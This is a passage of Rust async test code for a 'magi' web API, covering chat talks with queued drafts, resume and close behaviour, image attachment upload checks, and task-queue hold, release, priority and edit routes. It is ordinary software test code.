6073    /// to disk with the reclaimed guard dropped unread and no drainer ever
6074    /// started: the message sat queued until some unrelated later `say`
6075    /// happened to pick it up.
6076    ///
6077    /// This used to drive the handler future by hand, polling it a fixed
6078    /// number of times to park it at the `.await` where it asks for the turn
6079    /// and finds it busy, before the reclaim's slot-free case could be set up
6080    /// underneath it. That assumed a fixed number of polls lands at a fixed
6081    /// `.await` - which is not true: `blocking` awaits a `spawn_blocking`
6082    /// `JoinHandle`, and a `JoinHandle` already finished resolves in a single
6083    /// poll, so any number of this handler's several `blocking` awaits can
6084    /// collapse into one poll under load, landing the drive somewhere other
6085    /// than intended - including, occasionally, straight past the handler's
6086    /// own completion, which made polling it again panic with "async fn
6087    /// resumed after completion". No poll count fixes that; the handler's
6088    /// progress simply is not something a caller outside it can observe by
6089    /// counting.
6090    ///
6091    /// [`BusyQueueGate`] replaces the poll count with a real stop point
6092    /// inside the write itself, so the interleaving under test is pinned by
6093    /// an event instead of a guess: the gate fires only once the handler has
6094    /// actually decided `Busy` and is about to persist the draft, and it
6095    /// blocks that write until the test lets it through. Between those two
6096    /// moments the test drains the turn the handler found busy - through
6097    /// `drain_loop`, the protocol's other half - and then aborts the handler
6098    /// task outright, the same way axum drops a disconnected request's
6099    /// future. The write, and the reclaim it may do, run to completion
6100    /// regardless: they live in the `tokio::spawn` task the busy branch hands
6101    /// to the runtime before ever touching the gate, wholly independent of
6102    /// whether the handler that started it is still around - which is what
6103    /// this test is actually checking. A drainer other than that reclaim
6104    /// cannot exist here: the test's own `drain_loop` call happens before the
6105    /// gate opens, so it runs while the queue is still empty and hands the
6106    /// turn straight back rather than draining anything, closing off the
6107    /// possibility of the final assertion passing without the reclaim ever
6108    /// having done its job.
6109    #[tokio::test]
6110    async fn a_dropped_handler_future_after_queueing_still_drains_the_draft() {
6111        let tmp = TempDir::new().expect("tempdir");
6112        let repo = tmp.path().join("repo");
6113        std::fs::create_dir_all(&repo).expect("repo dir");
6114        std::fs::write(repo.join("magi.toml"), MOCK_AGENT_TOML).expect("write magi.toml");
6115        let home = TempDir::new().expect("temp home");
6116        let talks = Talks::at(home.path().join("talks"));
6117        let ui = Arc::new(
6118            Ui::new(
6119                Queue::at(home.path().join("queue")),
6120                Questions::at(home.path().join("questions")),
6121                talks.clone(),
6122                home.path().join("runs"),
6123                home.path().to_path_buf(),
6124                repo.clone(),
6125            )
6126            .with_worktrees_root(home.path().join("wt")),
6127        );
6128        let cfg = config_for(&repo).await.expect("discover config");
6129
6130        for attempt in 0..3u32 {
6131            let talk = talk::begin(&talks, &cfg, repo.clone(), None).expect("begin talk");
6132            let id = talk.id.clone();
6133            // A turn is already running, which is what sends `talk_say` down
6134            // the busy branch.
6135            let turn_guard = ui
6136                .begin_talk_turn(&id)
6137                .expect("claim the turn")
6138                .expect("a fresh talk owes nobody a turn");
6139
6140            let (reached_tx, reached_rx) = tokio::sync::oneshot::channel();
6141            let (release_tx, release_rx) = std::sync::mpsc::channel();
6142            ui.set_busy_queue_gate(BusyQueueGate {
6143                reached: reached_tx,
6144                release: release_rx,
6145            });
6146
6147            let handler = tokio::spawn(talk_say(
6148                State(Arc::clone(&ui)),
6149                Path(id.clone()),
6150                Ok(Json(NewTalkTurn {
6151                    text: "what does the queue module do?".to_owned(),
6152                    attachments: Vec::new(),
6153                })),
6154            ));
6155
6156            // Wait for the busy branch to actually reach the gate, rather
6157            // than for any fixed number of polls of anything - a bounded
6158            // wait rather than a bare `.await` so a regression that never
6159            // reaches the gate fails the test instead of hanging it.
6160            tokio::time::timeout(Duration::from_secs(5), reached_rx)
6161                .await
6162                .unwrap_or_else(|_| {
6163                    panic!(
6164                        "attempt {attempt}: talk {id} never reached the busy branch's queue write"
6165                    )
6166                })
6167                .expect("the busy branch dropped the gate without using it");
6168
6169            // The turn that was running now finishes and gives the slot up
6170            // the way a real one does - through `drain_loop`, which finds
6171            // nothing queued yet (the write is still held at the gate) and
6172            // releases. The handler, parked inside `spawn_blocking` on the
6173            // other side of the gate, still believes the talk is busy -
6174            // exactly the interleaving the reclaim exists for.
6175            let running = talks.get(&id).expect("reload talk");
6176            drain_loop(running, talks.clone(), cfg.clone(), id.clone(), turn_guard).await;
6177
6178            // Drop the handler future now, the way a reloading phone drops
6179            // it: suspended waiting on the busy branch's answer, having
6180            // itself made no more progress since it handed the write off.
6181            handler.abort();
6182            let _ = handler.await;
6183
6184            // Only now let the gated write proceed. It persists the draft
6185            // and reclaims the now-free slot from inside the task the busy
6186            // branch already spawned - unaffected by the handler's abort
6187            // above, since that task was independent of the handler's own
6188            // future from the moment it was spawned.
6189            let _ = release_tx.send(());
6190
6191            // A settled talk: the draft drained into an operator turn and
6192            // answered.
6193            let mut fresh = talks.get(&id).expect("reload talk");
6194            for _ in 0..SETTLE_STEPS {
6195                if fresh.pending.is_empty() && fresh.turns.len() == 2 {
6196                    break;
6197                }
6198                tokio::time::sleep(Duration::from_millis(10)).await;
6199                fresh = talks.get(&id).expect("reload talk");
6200            }
6201            assert!(
6202                fresh.pending.is_empty() && fresh.turns.len() == 2,
6203                "attempt {attempt}: talk {id} left the operator's text queued \
6204                 with no drainer - the reclaimed turn was dropped along with \
6205                 the handler future (pending {:?}, {} turns)",
6206                fresh.pending,
6207                fresh.turns.len()
6208            );
6209        }
6210    }
6211
6212    #[tokio::test]
6213    async fn editing_a_recovered_pending_draft_restarts_its_drain_once() {
6214        let (_tmp, _repo, f) = talk_fixture().await;
6215        let id = f.post("/api/talks", None).await.json()["id"]
6216            .as_str()
6217            .expect("id")
6218            .to_owned();
6219        let store = f.talks();
6220        let mut recovered = store.get(&id).expect("opened talk");
6221        talk::queue(&mut recovered, &store, "saved before restart", Vec::new())
6222            .expect("persist pending draft without a live turn");
6223
6224        let edited = f
6225            .post(
6226                &format!("/api/talks/{id}/pending/edit"),
6227                Some(r#"{"text":"corrected","expected_text":"saved before restart","expected_attachments":[]}"#),
6228            )
6229            .await;
6230        assert_eq!(edited.status, 200, "{}", edited.body);
6231        assert!(edited.json()["thinking"].as_bool().unwrap());
6232
6233        let mut detail = f.get(&format!("/api/talks/{id}")).await.json();
6234        for _ in 0..SETTLE_STEPS {
6235            if detail["turns"].as_array().expect("turns").len() == 2 {
6236                break;
6237            }
6238            tokio::time::sleep(Duration::from_millis(10)).await;
6239            detail = f.get(&format!("/api/talks/{id}")).await.json();
6240        }
6241        let turns = detail["turns"].as_array().expect("turns");
6242        assert_eq!(
6243            turns.len(),
6244            2,
6245            "the recovered draft must run once: {detail}"
6246        );
6247        assert_eq!(turns[0]["body"], "corrected");
6248        assert_eq!(detail["pending"], "");
6249    }
6250
6251    #[tokio::test]
6252    async fn recovered_pending_requires_explicit_resume_and_duplicate_resume_runs_once() {
6253        let tmp = TempDir::new().expect("tempdir");
6254        let repo = tmp.path().join("repo");
6255        std::fs::create_dir_all(&repo).expect("repo dir");
6256        std::fs::write(repo.join("magi.toml"), SLOW_MOCK_AGENT_TOML).expect("write config");
6257        let f = Fixture::with_repo(repo).await;
6258        let id = f.post("/api/talks", None).await.json()["id"]
6259            .as_str()
6260            .expect("id")
6261            .to_owned();
6262        let store = f.talks();
6263        let mut recovered = store.get(&id).expect("opened talk");
6264        talk::queue(&mut recovered, &store, "saved before restart", Vec::new())
6265            .expect("persist pending draft without a live turn");
6266
6267        let refused = f
6268            .post(
6269                &format!("/api/talks/{id}/say"),
6270                Some(r#"{"text":"new message"}"#),
6271            )
6272            .await;
6273        assert_eq!(refused.status, 409, "{}", refused.body);
6274        assert!(refused.body.contains("resume"), "{}", refused.body);
6275        let saved = store.get(&id).expect("draft remains after refusal");
6276        assert!(saved.turns.is_empty());
6277        assert_eq!(saved.pending, "saved before restart");
6278
6279        let say_path = format!("/api/talks/{id}/say");
6280        let (first, second) = tokio::join!(
6281            f.post(&say_path, Some(r#"{"text":"concurrent one"}"#)),
6282            f.post(&say_path, Some(r#"{"text":"concurrent two"}"#)),
6283        );
6284        assert_eq!(first.status, 409, "{}", first.body);
6285        assert_eq!(second.status, 409, "{}", second.body);
6286        let saved = store
6287            .get(&id)
6288            .expect("draft remains after concurrent refusals");
6289        assert!(saved.turns.is_empty());
6290        assert_eq!(saved.pending, "saved before restart");
6291
6292        let resumed = f
6293            .post(&format!("/api/talks/{id}/pending/resume"), None)
6294            .await;
6295        assert_eq!(resumed.status, 202, "{}", resumed.body);
6296        let duplicate = f
6297            .post(&format!("/api/talks/{id}/pending/resume"), None)
6298            .await;
6299        assert_eq!(duplicate.status, 409, "{}", duplicate.body);
6300
6301        for _ in 0..SETTLE_STEPS {
6302            if store.get(&id).expect("talk").turns.len() == 2 {
6303                break;
6304            }
6305            tokio::time::sleep(Duration::from_millis(10)).await;
6306        }
6307        let finished = store.get(&id).expect("finished talk");
6308        assert_eq!(finished.turns.len(), 2, "{finished:?}");
6309        assert_eq!(finished.turns[0].body, "saved before restart");
6310        assert!(finished.pending.is_empty());
6311    }
6312
6313    #[tokio::test]
6314    async fn an_image_only_recovered_draft_resumes_without_text() {
6315        let (_tmp, _repo, f) = talk_fixture().await;
6316        let id = f.post("/api/talks", None).await.json()["id"]
6317            .as_str()
6318            .expect("id")
6319            .to_owned();
6320        let uploaded = f
6321            .post_bytes(
6322                &format!("/api/talks/{id}/attachments"),
6323                &[("Content-Type", "image/png"), ("X-Filename", "saved.png")],
6324                PNG_BYTES,
6325            )
6326            .await;
6327        assert_eq!(uploaded.status, 201, "{}", uploaded.body);
6328        let attachment = f
6329            .talks()
6330            .attachment_meta(&id, uploaded.json()["id"].as_str().expect("attachment id"))
6331            .expect("attachment metadata")
6332            .expect("stored attachment");
6333        let store = f.talks();
6334        let mut recovered = store.get(&id).expect("opened talk");
6335        talk::queue(&mut recovered, &store, "", vec![attachment]).expect("queue image only");
6336
6337        let resumed = f
6338            .post(&format!("/api/talks/{id}/pending/resume"), None)
6339            .await;
6340        assert_eq!(resumed.status, 202, "{}", resumed.body);
6341        for _ in 0..SETTLE_STEPS {
6342            if store.get(&id).expect("talk").turns.len() == 2 {
6343                break;
6344            }
6345            tokio::time::sleep(Duration::from_millis(10)).await;
6346        }
6347        let finished = store.get(&id).expect("finished talk");
6348        assert_eq!(finished.turns.len(), 2, "{finished:?}");
6349        assert!(finished.turns[0].body.is_empty());
6350        assert_eq!(finished.turns[0].attachments.len(), 1);
6351        assert!(finished.pending_attachments.is_empty());
6352    }
6353
6354    #[tokio::test]
6355    async fn closed_talk_refuses_pending_mutations_without_changing_the_record() {
6356        let (_tmp, _repo, f) = talk_fixture().await;
6357        let id = f.post("/api/talks", None).await.json()["id"]
6358            .as_str()
6359            .expect("id")
6360            .to_owned();
6361        let closed = f.post(&format!("/api/talks/{id}/close"), None).await;
6362        assert_eq!(closed.status, 200, "{}", closed.body);
6363        let before_clear = serde_json::to_value(f.talks().get(&id).expect("closed talk"))
6364            .expect("serialize closed talk");
6365        for (path, body) in [
6366            (format!("/api/talks/{id}/pending/resume"), None),
6367            (
6368                format!("/api/talks/{id}/pending/clear"),
6369                Some(r#"{"expected_text":"","expected_attachments":[]}"#),
6370            ),
6371            (
6372                format!("/api/talks/{id}/pending/edit"),
6373                Some(r#"{"text":"x","expected_text":"","expected_attachments":[]}"#),
6374            ),
6375            (format!("/api/talks/{id}/say"), Some(r#"{"text":"x"}"#)),
6376        ] {
6377            let response = f.post(&path, body).await;
6378            assert_eq!(response.status, 409, "{}", response.body);
6379        }
6380        let after_clear = serde_json::to_value(f.talks().get(&id).expect("closed talk"))
6381            .expect("serialize closed talk");
6382        assert_eq!(
6383            after_clear, before_clear,
6384            "clear must not rewrite a closed talk"
6385        );
6386    }
6387
6388    /// Keeps both claims observable long enough to exercise the distinction
6389    /// between one busy talk and a globally locked Chat surface.
6390    const SLOW_MOCK_AGENT_TOML: &str = "[[agents]]\nid = \"mock\"\nkind = \"command\"\ncommand = [\"sh\", \"-c\", \"cat >/dev/null && sleep 0.3 && printf ok\"]\n";
6391
6392    #[tokio::test]
6393    async fn talks_report_independent_thinking_claims_and_queue_a_second_message() {
6394        let tmp = TempDir::new().expect("tempdir");
6395        let repo = tmp.path().join("repo");
6396        std::fs::create_dir_all(&repo).expect("repo dir");
6397        std::fs::write(repo.join("magi.toml"), SLOW_MOCK_AGENT_TOML).expect("write config");
6398        let f = Fixture::with_repo(repo).await;
6399        let id_a = f.post("/api/talks", None).await.json()["id"]
6400            .as_str()
6401            .unwrap()
6402            .to_owned();
6403        let id_b = f.post("/api/talks", None).await.json()["id"]
6404            .as_str()
6405            .unwrap()
6406            .to_owned();
6407
6408        let a = f
6409            .post(&format!("/api/talks/{id_a}/say"), Some(r#"{"text":"a"}"#))
6410            .await;
6411        assert_eq!(a.status, 202, "{}", a.body);
6412        assert_eq!(a.json()["thinking"], true);
6413        let b = f
6414            .post(&format!("/api/talks/{id_b}/say"), Some(r#"{"text":"b"}"#))
6415            .await;
6416        assert_eq!(b.status, 202, "{}", b.body);
6417        assert_eq!(b.json()["thinking"], true);
6418
6419        let listed = f.get("/api/talks").await.json();
6420        for id in [&id_a, &id_b] {
6421            let view = listed
6422                .as_array()
6423                .unwrap()
6424                .iter()
6425                .find(|talk| talk["id"] == *id)
6426                .unwrap();
6427            assert_eq!(view["thinking"], true, "{listed}");
6428        }
6429        let repeated = f
6430            .post(
6431                &format!("/api/talks/{id_a}/say"),
6432                Some(r#"{"text":"again"}"#),
6433            )
6434            .await;
6435        assert_eq!(repeated.status, 202, "{}", repeated.body);
6436        assert_eq!(repeated.json()["pending"], "again");
6437    }
6438
6439    /// Bytes `sniffed_mime` recognises as `image/png` - the signature plus a
6440    /// few more, since real uploads are never exactly eight bytes.
6441    const PNG_BYTES: &[u8] = b"\x89PNG\r\n\x1a\n\x00\x00\x00\x0dIHDR\x00\x00\x00\x01";
6442
6443    #[tokio::test]
6444    async fn a_png_attachment_upload_is_201_and_get_returns_it_with_nosniff() {
6445        let f = Fixture::start().await;
6446        let id = seed_talk(&f, "20260905-000000-a1b2", "open");
6447
6448        let res = f
6449            .post_bytes(
6450                &format!("/api/talks/{id}/attachments"),
6451                &[("Content-Type", "image/png"), ("X-Filename", "shot.png")],
6452                PNG_BYTES,
6453            )
6454            .await;
6455        assert_eq!(res.status, 201, "{}", res.body);
6456        let body = res.json();
6457        assert_eq!(body["name"], "shot.png");
6458        assert_eq!(body["mime"], "image/png");
6459        assert_eq!(body["bytes"], PNG_BYTES.len());
6460        let att_id = body["id"].as_str().expect("id").to_owned();
6461        assert_eq!(
6462            att_id.len(),
6463            32,
6464            "the id must never be a client-suppliable path: {att_id}"
6465        );
6466
6467        let got = f
6468            .get(&format!("/api/talks/{id}/attachments/{att_id}"))
6469            .await;
6470        assert_eq!(got.status, 200, "{}", got.body);
6471        assert_eq!(got.header("content-type"), Some("image/png"));
6472        assert_eq!(got.header("x-content-type-options"), Some("nosniff"));
6473        assert_eq!(got.bytes, PNG_BYTES);
6474    }
6475
6476    #[tokio::test]
6477    async fn an_svg_a_text_file_and_an_oversized_upload_are_all_4xx() {
6478        let f = Fixture::start().await;
6479        let id = seed_talk(&f, "20260905-000000-c3d4", "open");
6480
6481        // SVG can carry a `<script>`, so it is never on the whitelist even
6482        // though it is a real IANA image type.
6483        let svg = f
6484            .post_bytes(
6485                &format!("/api/talks/{id}/attachments"),
6486                &[("Content-Type", "image/svg+xml")],
6487                b"<svg xmlns=\"http://www.w3.org/2000/svg\"></svg>",
6488            )
6489            .await;
6490        assert!(
6491            (400..500).contains(&svg.status),
6492            "svg must be refused: {} {}",
6493            svg.status,
6494            svg.body
6495        );
6496        assert!(svg.body.contains("SVG"), "{}", svg.body);
6497
6498        let text = f
6499            .post_bytes(
6500                &format!("/api/talks/{id}/attachments"),
6501                &[("Content-Type", "text/plain")],
6502                b"just some text",
6503            )
6504            .await;
6505        assert!(
6506            (400..500).contains(&text.status),
6507            "an unlisted type must be refused: {} {}",
6508            text.status,
6509            text.body
6510        );
6511
6512        // The declared type is a real png, but the size check runs before
6513        // the bytes are even looked at.
6514        let oversized = vec![0u8; ATTACHMENT_MAX_BYTES + 1];
6515        let big = f
6516            .post_bytes(
6517                &format!("/api/talks/{id}/attachments"),
6518                &[("Content-Type", "image/png")],
6519                &oversized,
6520            )
6521            .await;
6522        assert_eq!(
6523            big.status,
6524            StatusCode::PAYLOAD_TOO_LARGE.as_u16(),
6525            "{}",
6526            big.body
6527        );
6528    }
6529
6530    #[tokio::test]
6531    async fn a_mislabeled_upload_is_refused_even_though_the_declared_type_is_on_the_whitelist() {
6532        let f = Fixture::start().await;
6533        let id = seed_talk(&f, "20260905-000000-d4e5", "open");
6534
6535        // A whitelisted `Content-Type`, but bytes that are not actually a
6536        // png - the declared header alone is never trusted.
6537        let res = f
6538            .post_bytes(
6539                &format!("/api/talks/{id}/attachments"),
6540                &[("Content-Type", "image/png")],
6541                b"<html>not a picture</html>",
6542            )
6543            .await;
6544        assert!((400..500).contains(&res.status), "{}", res.body);
6545    }
6546
6547    #[tokio::test]
6548    async fn an_unknown_attachment_id_is_a_404() {
6549        let f = Fixture::start().await;
6550        let id = seed_talk(&f, "20260905-000000-e5f6", "open");
6551
6552        let res = f
6553            .get(&format!("/api/talks/{id}/attachments/{}", "0".repeat(32)))
6554            .await;
6555        assert_eq!(res.status, 404, "{}", res.body);
6556    }
6557
6558    #[tokio::test]
6559    async fn talk_say_with_only_an_attachment_and_no_body_is_accepted_and_persists() {
6560        let f = Fixture::start().await;
6561        let id = seed_talk(&f, "20260905-000000-f6a7", "open");
6562
6563        let uploaded = f
6564            .post_bytes(
6565                &format!("/api/talks/{id}/attachments"),
6566                &[("Content-Type", "image/png"), ("X-Filename", "shot.png")],
6567                PNG_BYTES,
6568            )
6569            .await;
6570        assert_eq!(uploaded.status, 201, "{}", uploaded.body);
6571        let att_id = uploaded.json()["id"].as_str().expect("id").to_owned();
6572
6573        let res = f
6574            .post(
6575                &format!("/api/talks/{id}/say"),
6576                Some(&format!(r#"{{"text":"","attachments":["{att_id}"]}}"#)),
6577            )
6578            .await;
6579        assert_eq!(res.status, 202, "{}", res.body);
6580        let queued = res.json();
6581        let turns = queued["turns"].as_array().expect("turns array");
6582        assert_eq!(
6583            turns.len(),
6584            1,
6585            "an empty body with an attachment is still a turn: {queued}"
6586        );
6587        assert_eq!(turns[0]["who"], "operator");
6588        assert_eq!(turns[0]["body"], "");
6589        let atts = turns[0]["attachments"]
6590            .as_array()
6591            .expect("attachments array");
6592        assert_eq!(atts.len(), 1);
6593        assert_eq!(atts[0]["id"], att_id);
6594        assert_eq!(atts[0]["mime"], "image/png");
6595
6596        // Not only in the response: `record` flushes to disk before the
6597        // agent's own turn is even spawned.
6598        let on_disk = f.talks().get(&id).expect("get");
6599        assert_eq!(on_disk.turns[0].attachments.len(), 1);
6600        assert_eq!(on_disk.turns[0].attachments[0].id, att_id);
6601    }
6602
6603    #[tokio::test]
6604    async fn saying_with_an_unknown_attachment_id_is_a_4xx_and_records_nothing() {
6605        let f = Fixture::start().await;
6606        let id = seed_talk(&f, "20260905-000000-a7b8", "open");
6607
6608        let res = f
6609            .post(
6610                &format!("/api/talks/{id}/say"),
6611                Some(&format!(
6612                    r#"{{"text":"hi","attachments":["{}"]}}"#,
6613                    "a".repeat(32)
6614                )),
6615            )
6616            .await;
6617        assert!((400..500).contains(&res.status), "{}", res.body);
6618        assert!(res.body.contains("unknown attachment"), "{}", res.body);
6619
6620        let on_disk = f.talks().get(&id).expect("get");
6621        assert!(
6622            on_disk.turns.is_empty(),
6623            "a rejected attachment id must not partially record the turn: {:?}",
6624            on_disk.turns
6625        );
6626    }
6627
6628    #[tokio::test]
6629    async fn talk_close_makes_the_talk_refuse_further_turns() {
6630        let f = Fixture::start().await;
6631        let id = seed_talk(&f, "20260904-014455-cd34", "open");
6632
6633        let closed = f.post(&format!("/api/talks/{id}/close"), None).await;
6634        assert_eq!(closed.status, 200, "{}", closed.body);
6635        assert_eq!(closed.json()["status"], "closed");
6636
6637        // Idempotent: closing an already-closed talk is not an error.
6638        let closed_again = f.post(&format!("/api/talks/{id}/close"), None).await;
6639        assert_eq!(closed_again.status, 200);
6640        assert_eq!(closed_again.json()["status"], "closed");
6641
6642        let said = f
6643            .post(
6644                &format!("/api/talks/{id}/say"),
6645                Some(r#"{"text":"too late"}"#),
6646            )
6647            .await;
6648        assert_eq!(said.status, 409, "{}", said.body);
6649    }
6650
6651    #[tokio::test]
6652    async fn talk_reopen_lets_a_closed_talk_take_turns_again_and_is_idempotent() {
6653        let (_tmp, _repo, f) = talk_fixture().await;
6654        let id = f.post("/api/talks", None).await.json()["id"]
6655            .as_str()
6656            .expect("id")
6657            .to_owned();
6658        let closed = f.post(&format!("/api/talks/{id}/close"), None).await;
6659        assert_eq!(closed.status, 200, "{}", closed.body);
6660
6661        let reopened = f.post(&format!("/api/talks/{id}/reopen"), None).await;
6662        assert_eq!(reopened.status, 200, "{}", reopened.body);
6663        assert_eq!(reopened.json()["status"], "open");
6664
6665        // Idempotent: reopening an already-open talk is not an error.
6666        let reopened_again = f.post(&format!("/api/talks/{id}/reopen"), None).await;
6667        assert_eq!(reopened_again.status, 200);
6668        assert_eq!(reopened_again.json()["status"], "open");
6669
6670        let said = f
6671            .post(
6672                &format!("/api/talks/{id}/say"),
6673                Some(r#"{"text":"still there?"}"#),
6674            )
6675            .await;
6676        assert_eq!(
6677            said.status, 202,
6678            "a reopened talk accepts turns again: {}",
6679            said.body
6680        );
6681    }
6682
6683    #[tokio::test]
6684    async fn talk_reopen_on_an_unknown_id_is_404() {
6685        let f = Fixture::start().await;
6686        let res = f.post("/api/talks/nonexistent-id/reopen", None).await;
6687        assert_eq!(res.status, 404, "{}", res.body);
6688    }
6689
6690    #[tokio::test]
6691    async fn talk_delete_removes_the_talk_from_disk_and_the_list() {
6692        let f = Fixture::start().await;
6693        let id = seed_talk(&f, "20260904-014455-ef56", "closed");
6694
6695        let deleted = f.delete(&format!("/api/talks/{id}")).await;
6696        assert_eq!(deleted.status, 204, "{}", deleted.body);
6697
6698        let after = f.get(&format!("/api/talks/{id}")).await;
6699        assert_eq!(after.status, 404, "{}", after.body);
6700
6701        let listed = f.get("/api/talks").await.json();
6702        assert!(
6703            listed.as_array().unwrap().iter().all(|t| t["id"] != id),
6704            "a deleted talk must not linger in the list: {listed}"
6705        );
6706    }
6707
6708    #[tokio::test]
6709    async fn talk_delete_on_an_unknown_id_is_404() {
6710        let f = Fixture::start().await;
6711        let res = f.delete("/api/talks/nonexistent-id").await;
6712        assert_eq!(res.status, 404, "{}", res.body);
6713    }
6714
6715    #[tokio::test]
6716    async fn holding_then_releasing_returns_a_task_to_the_loop_with_a_fresh_budget() {
6717        let f = Fixture::start().await;
6718        let queue = f.queue();
6719        let mut task = Task::new(
6720            "spent".to_owned(),
6721            "Try again".to_owned(),
6722            PathBuf::from("/repo/magi"),
6723            Source::Human,
6724        );
6725        task.start("20260902-140502-bbbb".to_owned());
6726        task.fail("agent gave up", 9);
6727        queue.put(&mut task).expect("file the task");
6728
6729        let held = f.post(&format!("/api/queue/{}/hold", task.id), None).await;
6730        assert_eq!(held.status, 200);
6731        assert_eq!(held.json()["status_str"], "held");
6732
6733        let released = f
6734            .post(&format!("/api/queue/{}/release", task.id), None)
6735            .await;
6736        assert_eq!(released.status, 200);
6737        assert_eq!(released.json()["status_str"], "queued");
6738        assert_eq!(
6739            released.json()["attempts"],
6740            0,
6741            "release is a real second chance, not an instant re-hold"
6742        );
6743        assert_eq!(
6744            queue.get(&task.id).expect("reload").status,
6745            TaskStatus::Queued,
6746            "the change is on disk, not only in the reply"
6747        );
6748        assert!(
6749            !f.home
6750                .path()
6751                .join("queue")
6752                .join(format!("{}.lock", task.id))
6753                .exists(),
6754            "the claim the mutation took is released again"
6755        );
6756    }
6757
6758    #[tokio::test]
6759    async fn a_task_a_daemon_is_running_cannot_be_changed_from_the_phone() {
6760        let f = Fixture::start().await;
6761        let queue = f.queue();
6762        let mut task = Task::new(
6763            "busy".to_owned(),
6764            "Running right now".to_owned(),
6765            PathBuf::from("/repo/magi"),
6766            Source::Human,
6767        );
6768        queue.put(&mut task).expect("file the task");
6769        let _claim = queue.claim(&task.id).expect("stand in for the daemon");
6770
6771        let res = f.post(&format!("/api/queue/{}/hold", task.id), None).await;
6772
6773        assert_eq!(res.status, 409);
6774        assert_eq!(
6775            queue.get(&task.id).expect("reload").status,
6776            TaskStatus::Queued,
6777            "the refused hold changed nothing"
6778        );
6779    }
6780
6781    #[tokio::test]
6782    async fn holding_with_a_reason_reads_back_from_show_and_the_card_and_release_clears_it() {
6783        let f = Fixture::start().await;
6784        let queue = f.queue();
6785        let mut task = Task::new(
6786            "waiting on the migration".to_owned(),
6787            "Do the thing".to_owned(),
6788            PathBuf::from("/repo/magi"),
6789            Source::Human,
6790        );
6791        queue.put(&mut task).expect("file the task");
6792
6793        let held = f
6794            .post(
6795                &format!("/api/queue/{}/hold", task.id),
6796                Some(r#"{"reason":"waiting for 20260101-000000-aaaa to land"}"#),
6797            )
6798            .await;
6799        assert_eq!(held.status, 200, "{}", held.body);
6800        assert_eq!(held.json()["status_str"], "held");
6801        assert_eq!(
6802            held.json()["hold_reason"],
6803            "waiting for 20260101-000000-aaaa to land"
6804        );
6805
6806        let listed = f.get("/api/queue").await.json();
6807        assert_eq!(
6808            listed[0]["hold_reason"], "waiting for 20260101-000000-aaaa to land",
6809            "the card reads the reason off the same list route"
6810        );
6811
6812        // A hold with no body at all must keep working - most holds have no
6813        // reason to give.
6814        let mut plain = Task::new(
6815            "no reason given".to_owned(),
6816            "Do another thing".to_owned(),
6817            PathBuf::from("/repo/magi"),
6818            Source::Human,
6819        );
6820        queue.put(&mut plain).expect("file the task");
6821        let held_plain = f.post(&format!("/api/queue/{}/hold", plain.id), None).await;
6822        assert_eq!(held_plain.status, 200, "{}", held_plain.body);
6823        assert!(held_plain.json()["hold_reason"].is_null());
6824
6825        let released = f
6826            .post(&format!("/api/queue/{}/release", task.id), None)
6827            .await;
6828        assert_eq!(released.status, 200);
6829        assert!(
6830            released.json()["hold_reason"].is_null(),
6831            "a release must clear the reason so the next hold does not inherit it"
6832        );
6833    }
6834
6835    #[tokio::test]
6836    async fn priority_can_be_raised_from_the_phone_and_moves_the_task_ahead() {
6837        let f = Fixture::start().await;
6838        let queue = f.queue();
6839        let mut older = Task::new(
6840            "filed first".to_owned(),
6841            "x".to_owned(),
6842            PathBuf::from("/repo/magi"),
6843            Source::Human,
6844        );
6845        older.id = "20260101-000001-aaaa".to_owned();
6846        let mut newer = Task::new(
6847            "filed second".to_owned(),
6848            "x".to_owned(),
6849            PathBuf::from("/repo/magi"),
6850            Source::Human,
6851        );
6852        newer.id = "20260101-000002-bbbb".to_owned();
6853        queue.put(&mut older).expect("file older");
6854        queue.put(&mut newer).expect("file newer");
6855
6856        // Equal priority: the newer task leads, the same order the old
6857        // newest-first `list()` already gave every equal-priority queue.
6858        let before = f.get("/api/queue").await.json();
6859        assert_eq!(before[0]["id"], newer.id);
6860        assert_eq!(before[1]["id"], older.id);
6861
6862        // Raising the *older* task is the meaningful case: it can only lead
6863        // now because its priority says so, not because it happens to be
6864        // newest.
6865        let raised = f
6866            .post(
6867                &format!("/api/queue/{}/priority", older.id),
6868                Some(r#"{"priority":10}"#),
6869            )
6870            .await;
6871        assert_eq!(raised.status, 200, "{}", raised.body);
6872        assert_eq!(raised.json()["priority"], 10);
6873
6874        let after = f.get("/api/queue").await.json();
6875        let names: Vec<&str> = after
6876            .as_array()
6877            .unwrap()
6878            .iter()
6879            .map(|t| t["id"].as_str().unwrap())
6880            .collect();
6881        // Highest priority first, which is the order next_runnable and
6882        // `magi task list` both use - GET /api/queue must agree with it
6883        // immediately, not just once the loop claims the task.
6884        assert_eq!(names[0], older.id, "the raised task now sorts first");
6885    }
6886
6887    #[tokio::test]
6888    async fn priority_is_refused_on_a_running_task_with_a_reason_in_the_body() {
6889        let f = Fixture::start().await;
6890        let queue = f.queue();
6891        let mut task = Task::new(
6892            "in flight".to_owned(),
6893            "x".to_owned(),
6894            PathBuf::from("/repo/magi"),
6895            Source::Human,
6896        );
6897        task.start("20260902-140502-bbbb".to_owned());
6898        queue.put(&mut task).expect("file the task");
6899
6900        let res = f
6901            .post(
6902                &format!("/api/queue/{}/priority", task.id),
6903                Some(r#"{"priority":9}"#),
6904            )
6905            .await;
6906        assert_eq!(res.status, 400, "{}", res.body);
6907        assert!(
6908            res.json()["error"]
6909                .as_str()
6910                .is_some_and(|e| e.contains("running")),
6911            "{}",
6912            res.body
6913        );
6914        assert_eq!(
6915            queue.get(&task.id).expect("reload").priority,
6916            0,
6917            "the refused write must not partially apply"
6918        );
6919    }
6920
6921    #[tokio::test]
6922    async fn editing_replaces_title_and_instruction_and_keeps_id_created_at_source_and_runs() {
6923        let f = Fixture::start().await;
6924        let queue = f.queue();
6925        let mut task = Task::new(
6926            "old title".to_owned(),
6927            "old instruction".to_owned(),
6928            PathBuf::from("/repo/magi"),
6929            Source::Agent {
6930                run: "20260101-000000-beef".to_owned(),
6931                node: "implement".to_owned(),
6932            },
6933        );
6934        task.runs.push("20260101-000000-beef".to_owned());
6935        queue.put(&mut task).expect("file the task");
6936        let created_at = task.created_at;
6937
6938        let edited = f
6939            .post(
6940                &format!("/api/queue/{}/edit", task.id),
6941                Some(r#"{"title":"new title","instruction":"new instruction"}"#),
6942            )
6943            .await;
6944        assert_eq!(edited.status, 200, "{}", edited.body);
6945        let body = edited.json();
6946        assert_eq!(body["title"], "new title");
6947        assert_eq!(body["instruction"], "new instruction");
6948        assert_eq!(body["id"], task.id, "editing must not mint a new id");
6949        assert_eq!(body["created_at"], created_at.to_string());
6950        assert_eq!(
6951            body["source"]["kind"], "agent",
